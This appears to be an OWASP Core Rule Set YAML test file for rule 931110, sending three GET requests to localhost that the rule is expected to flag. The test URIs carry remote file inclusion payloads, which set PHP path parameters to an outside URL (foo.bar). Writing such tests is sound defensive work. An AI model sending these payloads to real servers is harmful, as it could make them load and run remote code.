---
meta:
  author: "csanders-git, azurit"
rule_id: 931110
tests:
  - test_id: 1
    desc: Remote File Inclusion Attack (931110) from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Accept-Encoding: gzip, deflate
            Accept-Language: zh-sg
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            Referer: http
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [931110]
  - test_id: 2
    desc: Remote File Inclusion Attack (931110) from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Accept-Encoding: gzip, deflate
            Accept-Language: zh-sg
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            Referer: http
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [931110]
  - test_id: 3
    desc: Remote File Inclusion Attack (931110) from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Accept-Encoding: gzip, deflate
            Accept-Language: zh-sg
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            Referer: http
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [931110]
